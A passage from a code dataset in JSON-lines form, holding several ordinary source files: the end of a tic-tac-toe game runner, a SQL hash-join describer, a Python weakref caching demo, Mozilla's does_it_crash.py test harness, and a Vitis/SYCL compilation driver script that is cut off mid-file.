ttt.result(board, (i, j))\n\n if game_over:\n againButton = pygame.Rect(width / 3, height - 65, width / 3, 50)\n again = mediumFont.render(\"Play Again\", True, black)\n againRect = again.get_rect()\n againRect.center = againButton.center\n pygame.draw.rect(screen, white, againButton)\n screen.blit(again, againRect)\n click, _, _ = pygame.mouse.get_pressed()\n if click == 1:\n mouse = pygame.mouse.get_pos()\n if againButton.collidepoint(mouse):\n time.sleep(0.2)\n user = None\n board = ttt.initial_state()\n ai_turn = False\n\n pygame.display.flip()\n","repo_name":"wbsth/cs50ai","sub_path":"week0/tictactoe/runner.py","file_name":"runner.py","file_ext":"py","file_size_in_byte":4709,"program_lang":"python","lang":"en","doc_type":"code","stars":112,"dataset":"github-code","pt":"34"}
{"seq_id":"34558355472","text":"from node import Node\n\ndef hash_join_define(node : Node, condition,index_column_dict):\n \"\"\" \n Returns the natural language description of the Hash Join Node Types\n \n Parameter node: the Node object.\n\n Parameter condition: The specific SQL Query clause.\n\n Parameter index_column_dict: The dictionary that contains the index names and their respective tables and table columns. \n \n \"\"\"\n\n result = \"The clause \" + condition + f\" performs a join operation using Hash {node.information['Join Type']} Join based on the result from the previous hash operation\" \n join_filter = node.join_filters[0]\n result += \" on the condition: {}\".format(join_filter)\n if (\" = \" in condition):\n result += \" as it is an equi-join, but also\"\n return result\n\n","repo_name":"Sdidt/CX4031_Project2","sub_path":"result_parser/node_types/hash_join.py","file_name":"hash_join.py","file_ext":"py","file_size_in_byte":792,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"}
{"seq_id":"15488168025","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\nimport weakref\n\n\n\"\"\"\nCaching Objects\n\n\nThe ref and proxy classes are considered \"low level.\" While they are useful for maintaining weak references to\nindividual objects and allowing cycles to be garbage collected, the WeakKeyDictionary and WeakValueDictionary classes\nprovide a more appropriate API for creating a cache of several objects.\n\nThe WeakValueDictionary class uses weak references to the values it holds, allowing them to be garbage collected when\nother code is not actually using them. 
Using explicit calls to the garbage collector illustrates the difference between\nmemory handling with a regular dictionary and WeakValueDictionary.\n\"\"\"\n\nimport gc\nfrom pprint import pprint\nimport weakref\n\n\ngc.set_debug(gc.DEBUG_UNCOLLECTABLE)\n\n\nclass ExpensiveObject(object):\n\n\tdef __init__(self, name):\n\t\tself.name = name\n\n\tdef __repr__(self):\n\t\treturn 'ExpensiveObject({})'.format(self.name)\n\n\tdef __del__(self):\n\t\tprint(' (Deleting {})'.format(self))\n\n\ndef demo(cache_factory):\n\t# hold objects so any weak references\n\t# are not removed immediately\n\tall_refs = {}\n\n\t# create the cache using the factory\n\tprint('CACHE TYPE:', cache_factory)\n\tcache = cache_factory()\n\tfor name in ['one', 'two', 'three']:\n\t\to = ExpensiveObject(name)\n\t\tcache[name] = o\n\t\tall_refs[name] = o\n\t\tdel o\n\n\tprint(' all_refs =', end=' ')\n\tpprint(all_refs)\n\tprint('\\n Before, cache contains:', list(cache.keys()))\n\tfor name, value in cache.items():\n\t\tprint(' {} = {}'.format(name, value))\n\t\tdel value\n\n\t# remove all references to the objects except the cache\n\tprint('\\n Cleanup:')\n\tdel all_refs\n\tgc.collect()\n\n\tprint('\\n After, cache contains:', list(cache.keys()))\n\tfor name, value in cache.items():\n\t\tprint(' {} = {}'.format(name, value))\n\tprint(' demo returning')\n\treturn\n\n\ndemo(dict)\nprint()\ndemo(weakref.WeakValueDictionary)","repo_name":"nixawk/hello-python3","sub_path":"weakref/weakref-caching_objects.py","file_name":"weakref-caching_objects.py","file_ext":"py","file_size_in_byte":1854,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"34"}
{"seq_id":"40762956103","text":"#!/usr/bin/env python\n# ***** BEGIN LICENSE BLOCK *****\n# This Source Code Form is subject to the terms of the Mozilla Public\n# License, v. 2.0. If a copy of the MPL was not distributed with this file,\n# You can obtain one at http://mozilla.org/MPL/2.0/.\n# ***** END LICENSE BLOCK *****\n\"\"\" does_it_crash.py\n\n Runs a thing to see if it crashes within a set period.\n\"\"\"\nimport os\nimport sys\n\nimport requests\n\nsys.path.insert(1, os.path.dirname(sys.path[0]))\n\nimport mozinstall\nfrom mozharness.base.script import BaseScript\nfrom mozprocess import ProcessHandler\n\n\nclass DoesItCrash(BaseScript):\n config_options = [\n [\n [\n \"--thing-url\",\n ],\n {\n \"action\": \"store\",\n \"dest\": \"thing_url\",\n \"type\": str,\n \"help\": \"A URL that points to a package containing the thing to run\",\n },\n ],\n [\n [\n \"--thing-to-run\",\n ],\n {\n \"action\": \"store\",\n \"dest\": \"thing_to_run\",\n \"type\": str,\n \"help\": \"The thing to run. If --thing-url is a package, this should be \"\n \"its location relative to the root of the package.\",\n },\n ],\n [\n [\n \"--thing-arg\",\n ],\n {\n \"action\": \"append\",\n \"dest\": \"thing_args\",\n \"type\": str,\n \"default\": [],\n \"help\": \"Args for the thing. 
May be passed multiple times\",\n },\n ],\n [\n [\n \"--run-for\",\n ],\n {\n \"action\": \"store\",\n \"dest\": \"run_for\",\n \"default\": 30,\n \"type\": int,\n \"help\": \"How long to run the thing for, in seconds\",\n },\n ],\n ]\n\n def __init__(self):\n super(DoesItCrash, self).__init__(\n all_actions=[\n \"download\",\n \"run-thing\",\n ],\n default_actions=[\n \"download\",\n \"run-thing\",\n ],\n config_options=self.config_options,\n )\n\n def downloadFile(self, url, file_name):\n req = requests.get(url, stream=True, timeout=30)\n file_path = os.path.join(os.getcwd(), file_name)\n\n with open(file_path, \"wb\") as f:\n for chunk in req.iter_content(chunk_size=1024):\n if not chunk:\n continue\n f.write(chunk)\n f.flush()\n return file_path\n\n def download(self):\n url = self.config[\"thing_url\"]\n fn = \"thing.\" + url.split(\".\")[-1]\n self.downloadFile(url=url, file_name=fn)\n if mozinstall.is_installer(fn):\n self.install_dir = mozinstall.install(fn, \"thing\")\n else:\n self.install_dir = \"\"\n\n def run_thing(self):\n thing = os.path.abspath(\n os.path.join(self.install_dir, self.config[\"thing_to_run\"])\n )\n # thing_args is a LockedTuple, which mozprocess doesn't like\n args = list(self.config[\"thing_args\"])\n timeout = self.config[\"run_for\"]\n\n self.log(f\"Running {thing} with args {args}\")\n p = ProcessHandler(\n thing,\n args=args,\n shell=False,\n storeOutput=True,\n kill_on_timeout=True,\n stream=False,\n )\n p.run(timeout)\n # Wait for the timeout + a grace period (to make sure we don't interrupt\n # process tear down).\n # Without this, this script could potentially hang\n p.wait(timeout + 10)\n if not p.timedOut:\n # It crashed, oh no!\n self.critical(\n f\"TEST-UNEXPECTED-FAIL: {thing} did not run for {timeout} seconds\"\n )\n self.critical(\"Output was:\")\n for l in p.output:\n self.critical(l)\n self.fatal(\"fail\")\n else:\n self.info(f\"PASS: {thing} ran successfully for {timeout} seconds\")\n\n\n# __main__ {{{1\nif __name__ == \"__main__\":\n crashit = DoesItCrash()\n crashit.run_and_exit()\n","repo_name":"WaterfoxCo/Waterfox","sub_path":"testing/mozharness/scripts/does_it_crash.py","file_name":"does_it_crash.py","file_ext":"py","file_size_in_byte":4243,"program_lang":"python","lang":"en","doc_type":"code","stars":3159,"dataset":"github-code","pt":"34"} +{"seq_id":"38506888073","text":"#!/usr/bin/env python3\n\"\"\"sycl_vxx\nThis is an extra layer of abstraction on top of the shell invoking the\nVitis compiler. As SPIR/LLVM-IR is a second class citizen in Vitis for the\nmoment it has some little niggling details that need worked on and the idea\nis that this script will work around those with some aid from Clang/LLVM.\n\nOne of the main examples is that Vitis can only compile one kernel from LLVM-BC\nat a time and it requires the kernel name (also required for kernel-specific\noptimizations). This poses a problem as there can be multiple kernels in a\nfile. And when making a normal naked v++ -c command in the driver,\nyou won't have the necessary information as the command is generated before\nthe file has have even started to be compiled (perhaps there is, but I am\nunaware of). So, no kernel name and no idea how many Vitis commands you'd need\nto generate per file (no idea how many kernels are in a file).\n\nThis works around that by using an opt (kernelNameGen) pass that generates\nan intermediate file with the needed information that we eat up and can then\nloop over each kernel in a file. 
It's simple at the moment: just kernel names,\nbut could expand in the future to include optimization information for each\nkernel.\n\"\"\"\n\nfrom argparse import ArgumentParser\nimport functools\nfrom os.path import exists\nfrom itertools import starmap\nimport json\nimport math\nfrom multiprocessing import Pool\nfrom os import environ\nfrom pathlib import Path\nimport posix_ipc\nimport re\nimport shutil\nimport subprocess\nimport sys\nimport tempfile\n\n# This pipeline should be able to do any promotion -O3 is capable of\n# and some more control-flow optimizations than strictly necessary.\n# Some more minimization is probably possible\nOptimizationPipeline = [\n\"-passes=\"\n\"lower-sycl-metadata,\"\n\"preparesycl,\"\n\"loop-unroll,\"\n\"lower-expect,\"\n\"simplifycfg,\"\n\"sroa,\"\n\"early-cse,\"\n\"annotation2metadata,\"\n\"callsite-splitting,\"\n\"ipsccp,\"\n\"called-value-propagation,\"\n\"globalopt,\"\n\"mem2reg,\"\n\"deadargelim,\"\n\"simplifycfg,\"\n\"inline,\"\n\"function-attrs,\"\n\"sroa,\"\n\"early-cse,\"\n\"speculative-execution,\"\n\"jump-threading,\"\n\"correlated-propagation,\"\n\"simplifycfg,\"\n\"libcalls-shrinkwrap,\"\n\"tailcallelim,\"\n\"simplifycfg,\"\n\"reassociate,\"\n\"loop-simplify,\"\n\"lcssa,\"\n\"function(loop-mssa(licm)),\"\n\"loop-rotate,\"\n\"function(loop-mssa(licm)),\"\n\"simple-loop-unswitch,\"\n\"simplifycfg,\"\n\"loop-simplify,\"\n\"lcssa,\"\n\"indvars,\"\n\"loop-deletion,\"\n\"loop-unroll,\"\n\"sroa,\"\n\"mldst-motion,\"\n\"gvn,\"\n\"sccp,\"\n\"bdce,\"\n\"jump-threading,\"\n\"correlated-propagation,\"\n\"adce,\"\n\"dse,\"\n\"loop-simplify,\"\n\"lcssa,\"\n\"simplifycfg,\"\n\"elim-avail-extern,\"\n\"rpo-function-attrs,\"\n\"globalopt,\"\n\"globaldce,\"\n\"float2int,\"\n\"lower-constant-intrinsics,\"\n\"loop-simplify,\"\n\"lcssa,\"\n\"loop-rotate,\"\n\"loop-simplify,\"\n\"loop-load-elim,\"\n\"simplifycfg,\"\n\"loop-simplify,\"\n\"lcssa,\"\n\"loop-unroll,\"\n\"loop-simplify,\"\n\"lcssa,\"\n\"function(loop-mssa(licm)),\"\n\"alignment-from-assumptions,\"\n\"strip-dead-prototypes,\"\n\"globaldce,\"\n\"constmerge,\"\n\"loop-simplify,\"\n\"lcssa,\"\n\"loop-sink,\"\n\"instsimplify,\"\n\"div-rem-pairs,\"\n\"simplifycfg,\"\n\"inSPIRation\"\n]\n\nclass TmpDirManager:\n \"\"\" Context manager for a temporary directory that can be programmed\n to be cleaned up when the manager is destroyed.\n \"\"\"\n\n def __init__(self, tmpdir: Path, prefix: str, autodelete: bool):\n self.prefix = prefix\n self.tmpdir = tmpdir\n self.autodelete = autodelete\n if not autodelete:\n print(f\"Temporary clutter in {tmpdir} will not be deleted\")\n\n def __enter__(self) -> Path:\n self.dir = Path(tempfile.mkdtemp(\n dir=self.tmpdir,\n prefix=self.prefix\n ))\n return self.dir\n\n def __exit__(self, *_):\n if (self.autodelete):\n shutil.rmtree(self.dir)\n\n\ndef subprocess_error_handler(msg: str):\n \"\"\" Build decorator that prints an error message and prevents\n CompilationDriver from continuing when a called subprocess\n exits with non-zero status\n \"\"\"\n def decorator(func):\n def decorated(self, *args, **kwargs):\n if self.ok:\n try:\n return func(self, *args, **kwargs)\n except subprocess.CalledProcessError:\n print(msg, file=sys.stderr)\n self.ok = False\n return decorated\n return decorator\n\ndef run_if_ok(func):\n \"\"\" Function only runs if the internal ok state is true\"\"\"\n def decorated(self, *args, **kwargs):\n if self.ok:\n return func(self, *args, **kwargs)\n return decorated\n\n\ndef _run_in_isolated_proctree(cmd, *args, **kwargs):\n \"\"\" 
Run a command in isolated process namespace.\n This is necessary to get a clean termination of all v++\n subprocesses in case of program interruption, as v++ subprocess\n handling is strange.\n \"\"\"\n newcmd = (\"unshare\",\n \"--map-current-user\",\n \"--pid\",\n \"--mount-proc\",\n \"--kill-child\",\n *cmd)\n return subprocess.run(newcmd, *args, **kwargs)\n\n# choose how many parallel instances of v++ we should have at most\ndef get_exec_count():\n ram_gb = 0\n with open('/proc/meminfo') as file:\n for line in file:\n if 'MemAvailable' in line:\n # KiB to GiB\n ram_gb = int(line.split()[1]) / (1024 * 1024)\n break\n # each instance of vxx uses 5 GiB at most and we keep a 10% margin\n max_vxx_instance_count = int(math.trunc(ram_gb * 0.9) / 5)\n if max_vxx_instance_count == 0:\n print(\"warning: v++ is likely to run out of RAM\")\n max_vxx_instance_count = 1\n return max_vxx_instance_count\n\n# In test mode the resource usage is controlled by a global named semaphore\nis_test_mode = False\nif environ.get(\"SYCL_VXX_TEST_MODE\") is not None:\n is_test_mode = True\n\nclass CSema:\n def __init__(self):\n if is_test_mode:\n # this semaphore is global to all instances of sycl_vxx.py\n self.sema = posix_ipc.Semaphore(\"sycl_vxx.py\", flags= posix_ipc.O_CREAT, initial_value = get_exec_count())\n\n def __enter__(self):\n if is_test_mode:\n self.sema.acquire()\n\n def __exit__(self, a, b, c):\n if is_test_mode:\n self.sema.release()\n self.sema.close()\n\n\n# This is currently unused because a change between version 2021.2 and 2022.1 was later reverted.\n# But it is likely to become useful again in the future, so keep it as is\nclass VXXVersion:\n def __init__(self, exec_path) -> None:\n version_opt = {\"v++\" : \"-v\", \"vitis_hls\" : \"-version\"}\n cmd = (exec_path, version_opt[exec_path.name])\n proc_res = _run_in_isolated_proctree(cmd, capture_output=True)\n version_regex = r\".*v(?P<major>\\d{4})\\.(?P<minor>\\d).*\"\n match = re.match(version_regex,\n proc_res.stdout.decode('utf-8'),\n flags=re.DOTALL)\n self.major = int(match['major'])\n self.minor = int(match['minor'])\n print(f\"Found {exec_path.name} version {self}\")\n\n def __str__(self) -> str:\n return f\"{self.major}.{self.minor}\"\n\n def get_correct_opt_args(self):\n options = [\n (\"--sycl-vxx-array-partition-mode-arg\", 2022, 2),\n (\"--sycl-kernel-propgen-maxi-extra-arg\", 2022, 2)\n ]\n def should_add_option(opt_record):\n _, maj, min = opt_record\n return maj < self.major or (maj == self.major and min <= self.minor)\n return (opt for opt, _, _ in filter(should_add_option, options))\n\nclass VXXBinary:\n def __init__(self, execname):\n p = shutil.which(execname)\n if p is None:\n print(f\"error: unable to find {execname}\")\n print(f\"note: make sure you can run {execname} on the command line\\n\")\n raise FileNotFoundError\n self.path = Path(p)\n self.path = self.path.resolve()\n self.version = VXXVersion(self.path)\n if environ.get(\"XILINX_CLANG_39_BUILD_PATH\") is not None:\n self.clang_bin_ = Path(environ[\"XILINX_CLANG_39_BUILD_PATH\"]) / \"bin\"\n else:\n self.clang_bin_ = (\n self.path.parents[2] /\n \"/lnx64/tools/clang-3.9-csynth/bin\"\n ).resolve()\n if not (self.clang_bin_ / \"llvm-as\").is_file():\n self.clang_bin_ = (\n self.path.parents[3] /\n f\"Vitis_HLS/{self.version}\" /\n \"lnx64/tools/clang-3.9-csynth/bin\"\n ).resolve()\n\n @property\n def binary_dir(self):\n return self.path.parent\n\n @property\n def clang_bin(self):\n return self.clang_bin_\n\n\nclass VitisCompilationDriver:\n def __init__(self, arguments, 
execname):\n self.outpath = Path(arguments.o)\n self.tmp_root = arguments.tmp_root\n self.clang_path = arguments.clang_path.resolve()\n self.inputs = arguments.inputs\n self.vitisexec = VXXBinary(execname)\n self.vitis_bin_dir = self.vitisexec.binary_dir\n self.vitis_version = self.vitisexec.version\n self.outstem = self.outpath.stem\n self.ok = True\n self.vitis_clang_bin = self.vitisexec.clang_bin\n self.cmd_number = 0\n self.dont_execute_vxx = arguments.only_print_vxx_cmds or ('SYCL_VXX_DONT_USE_VXX' in environ)\n\n def _dump_cmd(self, stem, args):\n cmdline = \" \".join(map(str, args))\n with (self.tmpdir / f\"{self.cmd_number:0>3}-{stem}.cmd\").open(\"w\") as f:\n f.write(cmdline + \"\\n\")\n if environ.get(\"SYCL_VXX_DBG_CMD_DUMP\") is not None:\n f.write(f\"\\nOriginal command list: {args}\")\n if environ.get(\"SYCL_VXX_PRINT_CMD\") is not None:\n print(\"SYCL_VXX_CMD:\", cmdline)\n self.cmd_number += 1\n\n def _next_passes(self, inputs):\n return inputs\n\n @subprocess_error_handler(\"Linkage of multiple inputs failed\")\n def _link_multi_inputs(self, inputs):\n \"\"\"Link all input files into a single .bc\"\"\"\n output = self.tmpdir / f\"{self.outstem}-before-opt.bc\"\n if len(inputs) > 1:\n llvm_link = self.clang_path / \"llvm-link\"\n args = [str(llvm_link),\n *inputs,\n \"-o\",\n str(output)\n ]\n self._dump_cmd(\"link_multi_inputs\", args)\n subprocess.run(args, check=True)\n else:\n shutil.copy2(inputs[0], output)\n return output\n\n @subprocess_error_handler(\"Error in sycl->HLS conversion\")\n def _run_preparation(self, inputs):\n \"\"\"Run the various sycl->HLS conversion passes\"\"\"\n # We try to avoid as many optimizations as possible\n # to give vitis the opportunity to use its custom\n # optimizations\n outstem = self.outstem\n prepared_bc = (\n self.tmpdir /\n f\"{outstem}-kernels-prepared.ll\"\n )\n opt_options = [\"-S\",\n \"--sroa-vxx-conservative\",\n \"--lower-mem-intr-to-llvm-type\",\n \"--lower-mem-intr-full-unroll\",\n \"--unroll-only-when-forced\",\n ]\n opt_options.extend(OptimizationPipeline)\n opt_options.extend(self.vitis_version.get_correct_opt_args())\n opt_options.extend([\"-o\", f\"{prepared_bc}\"])\n\n opt = self.clang_path / \"opt\"\n args = [opt, *opt_options, inputs]\n self._dump_cmd(\"run_preparation\", args)\n subprocess.run(args, check=True)\n return prepared_bc\n\n @subprocess_error_handler(\"Error when preparing HLS SPIR library\")\n def _run_prepare_lib(self):\n vitis_lib_spir = (\n self.vitis_bin_dir.parent /\n \"lnx64/lib/libspir64-39-hls.bc\"\n ).resolve()\n if not vitis_lib_spir.is_file():\n vitis_lib_spir = (\n self.vitis_bin_dir.parents[2] /\n f\"Vitis_HLS/{self.vitis_version}/lnx64/lib/libspir64-39-hls.bc\"\n ).resolve()\n return vitis_lib_spir\n\n @subprocess_error_handler(\"Error when linking with HLS SPIR library\")\n def _link_spir(self, kernel, lib):\n llvm_link = self.vitis_clang_bin / 'llvm-link'\n linked_kernels = self.tmpdir / f\"{self.outstem}_kernels-linked.xpirbc\"\n args = [\n llvm_link,\n kernel,\n \"--only-needed\",\n lib,\n \"-o\",\n linked_kernels\n ]\n self._dump_cmd(\"link_spir\", args)\n subprocess.run(args, check=True)\n return linked_kernels\n\n @subprocess_error_handler(\"Error in preparing and downgrading IR\")\n def _downgrade(self, inputs):\n opt = self.clang_path / \"opt\"\n prepared_kernels = self.tmpdir / f\"{self.outstem}_linked.simple.ll\"\n kernel_prop = (\n self.tmpdir /\n f\"{self.outstem}-kernels_properties.json\"\n )\n\n opt_options = [\n \"--lower-mem-intr-to-llvm-type\", 
\"--lower-mem-intr-full-unroll\", \"--lower-delayed-sycl-metadata\",\n \"--sycl-prepare-after-O3\", \"--unroll-only-when-forced\", \"-S\",\n \"-passes=lower-sycl-metadata,globaldce,preparesycl,loop-unroll,kernelPropGen,globaldce\",\n \"-strip-debug\", \"--sycl-kernel-propgen-output\",\n f\"{kernel_prop}\",\n inputs,\n \"-o\", prepared_kernels\n ]\n opt_options.extend(self.vitis_version.get_correct_opt_args())\n args = [opt, *opt_options]\n self._dump_cmd(\"prepare\", args)\n subprocess.run(args, check=True)\n with kernel_prop.open('r') as kp_fp:\n self.kernel_properties = json.load(kp_fp)\n opt_options = [\"-S\", \"-passes=vxxIRDowngrader\"]\n downgraded_ir = (\n self.tmpdir / f\"{self.outstem}_kernels-linked.opt.ll\")\n args = [\n opt, *opt_options, prepared_kernels,\n \"-o\", downgraded_ir\n ]\n self._dump_cmd(\"downgrade\", args)\n subprocess.run(args, check=True)\n return downgraded_ir\n\n @subprocess_error_handler(\"Downgrading of llvm IR -> Vitis old llvm bitcode failed\")\n def _asm_ir(self, inputs):\n \"\"\"Assemble downgraded IR to bitcode using Vitis llvm-as\"\"\"\n vpp_llvm_input = self.tmpdir / f\"{self.outstem}_kernels.opt.xpirbc\"\n args = [\n self.vitis_clang_bin / \"llvm-as\",\n inputs,\n \"-o\",\n vpp_llvm_input\n ]\n self._dump_cmd(\"05-asm_ir.cmd\", args)\n subprocess.run(args, check=True)\n return vpp_llvm_input\n\n def drive_compilation(self):\n autodelete = environ.get(\"SYCL_VXX_KEEP_CLUTTER\") is None\n outstem = self.outstem\n tmp_root = self.tmp_root\n tmp_manager = TmpDirManager(tmp_root, outstem, autodelete)\n with tmp_manager as self.tmpdir:\n joined_kernels = self._link_multi_inputs(self.inputs)\n prepared_bc = self._run_preparation(joined_kernels)\n prepared_lib = self._run_prepare_lib()\n downgraded = self._downgrade(prepared_bc)\n if environ.get(\"SYCL_VXX_MANUAL_EDIT\") is not None:\n print(\"Please edit\", self.downgraded_ir)\n input(\"Press enter to resume the compilation\")\n assembled = self._asm_ir(downgraded)\n spir_linked = self._link_spir(assembled, prepared_lib)\n final = self._next_passes(spir_linked)\n try:\n if not self.dont_execute_vxx:\n shutil.copy2(final, self.outpath)\n except FileNotFoundError:\n print(\n f\"Output {self.xclbin} was not properly produced by previous commands\")\n return self.ok\n\n\nclass VXXCompilationDriver(VitisCompilationDriver):\n def __init__(self, arguments):\n \"\"\"Initializer the compilation driver for VXX mode\"\"\"\n super().__init__(arguments, \"v++\")\n self.vitis_mode = arguments.target\n # TODO: XILINX_PLATFORM should be passed by clang driver instead\n self.xilinx_platform = environ['XILINX_PLATFORM']\n self.extra_comp_args = []\n if arguments.vitis_comp_argfile is not None and exists(arguments.vitis_comp_argfile):\n with arguments.vitis_comp_argfile.open(\"r\") as f:\n content = f.read().strip()\n if content:\n self.extra_comp_args.extend(content.split(' '))\n self.extra_link_args = []\n if arguments.vitis_link_argfile is not None and exists(arguments.vitis_link_argfile):\n with arguments.vitis_link_argfile.open(\"r\") as f:\n content = f.read().strip()\n if content:\n self.extra_link_args.extend(content.split(' '))\n if (self.vitis_mode == \"sw_emu\"):\n raise Exception(\"sw_emu is not compatible with the HLS flow\")\n\n def _get_compile_kernel_cmd_out(self, kernel, inputs):\n \"\"\"Create command to compile kernel\"\"\"\n if self.ok:\n vxx = self.vitis_bin_dir / \"v++\"\n comp_config = environ.get('SYCL_VXX_COMP_CONFIG')\n kernel_output = self.tmpdir / f\"{kernel['name']}.xo\"\n command = [\n vxx, 
\"--target\", self.vitis_mode,\n \"--advanced.param\", \"compiler.hlsDataflowStrictMode=off\",\n # Do the optimizations that were not performed by the SYCL compiler\n \"-O3\",\n \"--platform\", self.xilinx_platform,\n \"--temp_dir\", self.tmpdir / 'vxx_comp_tmp',\n \"--log_dir\", self.tmpdir / 'vxx_comp_log',\n \"--report_dir\", self.tmpdir / 'vxx_comp_report',\n \"--save-temps\", \"-c\", \"-k\", kernel['name'], '-o', kernel_output,\n inputs\n ]\n if comp_config is not None and Path(comp_config).is_file():\n command.extend((\"--config\", Path(comp_config).resolve()))\n if 'extra_args' in kernel and kernel['extra_args'].strip():\n # User provided kernel arguments can contain many spaces,\n # leading split to give empty string that are incorrectly\n # interpreted as file name by v++ : filter remove them\n command.extend(\n filter(lambda x: x != '', kernel['extra_args'].split(' ')))\n command.extend(self.extra_comp_args)\n self._dump_cmd(f\"vxxcomp-{kernel['name']}\", command)\n return (kernel_output, command)\n\n def _compile_kernel(self, outname, command):\n \"\"\"Execute a kernel compilation command\"\"\"\n if self.ok:\n if not self.dont_execute_vxx:\n with CSema():\n _run_in_isolated_proctree(command, check=True)\n return outname\n\n @subprocess_error_handler(\"Vitis linkage stage failed\")\n def _link_kernels(self, kernels):\n \"\"\"Call v++ to link all kernel in one .xclbin\"\"\"\n xclbin = self.tmpdir / f\"{self.outstem}.xclbin\"\n vpp = self.vitis_bin_dir / \"v++\"\n link_config = environ.get('SYCL_VXX_LINK_CONFIG')\n command = [\n vpp, \"--target\", self.vitis_mode,\n \"--advanced.param\", \"compiler.hlsDataflowStrictMode=off\",\n \"--platform\", self.xilinx_platform,\n \"--temp_dir\", self.tmpdir / 'vxx_link_tmp',\n \"--log_dir\", self.tmpdir / 'vxx_link_log',\n \"--report_dir\", self.tmpdir / 'vxx_link_report',\n \"--save-temps\", \"-l\", \"-o\", xclbin\n ]\n if link_config is not None and Path(link_config).is_file():\n command.extend((\"--config\", Path(link_config).resolve()))\n has_assignment = False\n has_default = False\n for kernelprop in self.kernel_properties['kernels']:\n targets = dict()\n for mem_assign in kernelprop[\"bundle_hw_mapping\"]:\n if mem_assign[\"maxi_bundle_name\"] != \"default\":\n command.extend((\n \"--connectivity.sp\",\n \"{}_1.m_axi_{}:{}\".format(\n kernelprop[\"name\"],\n mem_assign[\"maxi_bundle_name\"],\n mem_assign[\"target_bank\"]\n )\n ))\n targets[mem_assign[\"maxi_bundle_name\"]\n ] = mem_assign[\"target_bank\"]\n for arg_assign in kernelprop[\"arg_bundle_mapping\"]:\n arg_name = arg_assign[\"arg_name\"]\n bundle_name = arg_assign[\"maxi_bundle_name\"]\n if bundle_name == \"default\":\n has_default = True\n else:\n target = targets[bundle_name]\n command.extend((\n \"--connectivity.sp\",\n \"{}_1.{}:{}\".format(\n kernelprop[\"name\"],\n arg_name,\n target\n )\n ))\n has_assignment = True\n if has_assignment and has_default:\n raise NotImplementedError(\n \"Mix between assigned an non assigned bank is not supported yet\")\n\n # The pipe plumbing is actually done by Vitis with the right options\n for pipe in self.kernel_properties['pipe_connections']:\n command.extend((\"--connectivity.sc\", \"{}_1.{}:{}_1.{}:{}\".format(\n pipe[\"writer_kernel\"], pipe[\"writer_arg\"], pipe[\"reader_kernel\"], pipe[\"reader_arg\"], pipe[\"depth\"])))\n\n command.extend(self.extra_link_args)\n command.extend(kernels)\n self._dump_cmd(\"vxxlink\", command)\n if not self.dont_execute_vxx:\n with CSema():\n _run_in_isolated_proctree(command, check=True)\n return 
xclbin\n\n @subprocess_error_handler(\"Vitis compilation stage failed\")\n def _launch_parallel_compilation(self, inputs):\n # Compilation commands are generated in main process to ensure\n # they are printed on main process stdout if command dump is set\n compile_commands = map(\n functools.partial(self._get_compile_kernel_cmd_out, inputs=inputs),\n self.kernel_properties[\"kernels\"])\n if environ.get(\"SYCL_VXX_SERIALIZE_VITIS_COMP\") is None:\n p = Pool()\n try:\n future = p.starmap_async(\n self._compile_kernel,\n compile_commands)\n return list(future.get())\n except KeyboardInterrupt:\n p.terminate()\n raise KeyboardInterrupt\n else:\n return list(starmap(self._compile_kernel, compile_commands))\n\n def _next_passes(self, inputs):\n # Driver specific area\n kernels = self._launch_parallel_compilation(inputs)\n xclbin = self._link_kernels(kernels)\n return xclbin\n\nclass IPExportCompilationDriver(VitisCompilationDriver):\n def __init__(self, arguments):\n \"\"\"Initializer the compilation driver for vitis_hls mode\"\"\"\n super().__init__(arguments, \"vitis_hls\")\n self.target = arguments.target\n self.clock_period = arguments.clock_period\n\n @run_if_ok\n def _get_top_comp_name(self):\n numKernels = len(self.kernel_properties[\"kernels\"])\n if numKernels != 1:\n raise Exception(\n f\"{numKernels} top level components found, should be exactly one\")\n kernelname = self.kernel_properties[\"kernels\"][0]['name']\n return kernelname\n\n @run_if_ok\n def _create_hls_script(self, compname, inputs):\n script = self.tmpdir / \"run_hls.tcl\"\n out = self.tmpdir / f\"{compname}.zip\"\n with script.open(\"w\") as sf:\n sf.writelines(map(lambda x : f\"{x}\\n\", [\n \"open_project -reset proj\",\n f\"add_files {inputs}\",\n f\"set_top {compname}\",\n \"open_solution -reset sol\",\n f\"set_part {self.target}\",\n f\"create_clock -period {self.clock_period} -name default\",\n \"config_dataflow -strict_mode off\",\n \"csynth_design\",\n f\"export_design -flow impl -format ip_catalog -output {out}\",\n \"exit\",\n ]))\n return script, out\n\n @subprocess_error_handler(\"Vitis HLS invocation failed\")\n def _run_vitis_hls(self, script):\n cmd = (self.vitisexec.path, \"-f\", script)\n self._dump_cmd(\"vitis-hls-invocation\", cmd)\n _run_in_isolated_proctree(cmd, check=True, cwd=self.tmpdir)\n\n def _next_passes(self, inputs):\n topcompname = self._get_top_comp_name()\n script, final_comp = self._create_hls_script(topcompname, inputs)\n self._run_vitis_hls(script)\n return final_comp\n\n\ndef parse_args(args=sys.argv[1:]):\n description=\"Utility to drive various compilation flow for vivado related tools\"\n toplevel_parser = ArgumentParser(description=description, add_help=False, prefix_chars=\"@\")\n toplevel_parser.add_argument(\"command\", choices=(\"vxxcompile\", \"ipexport\", \"help\"), help=\"Command to launch\")\n toplevel_parser.add_argument(\"args\", nargs=\"*\", help=\"Command arguments\")\n toplevel = toplevel_parser.parse_args(args=args)\n command = toplevel.command\n if command == \"help\":\n toplevel_parser.print_help()\n toplevel_parser.exit()\n parser = ArgumentParser(description=description)\n if command == \"vxxcompile\":\n parser.add_argument(\n \"--hls\",\n help=\"Activate the HLS flow instead of the default SPIR one\",\n action=\"store_true\")\n parser.add_argument(\n \"--target\",\n help=\"v++ synthesis mode\",\n choices=[\"sw_emu\", \"hw_emu\", \"hw\"],\n required=True)\n parser.add_argument(\n \"--vitis_comp_argfile\",\n help=\"file containing v++ -c argument\",\n 
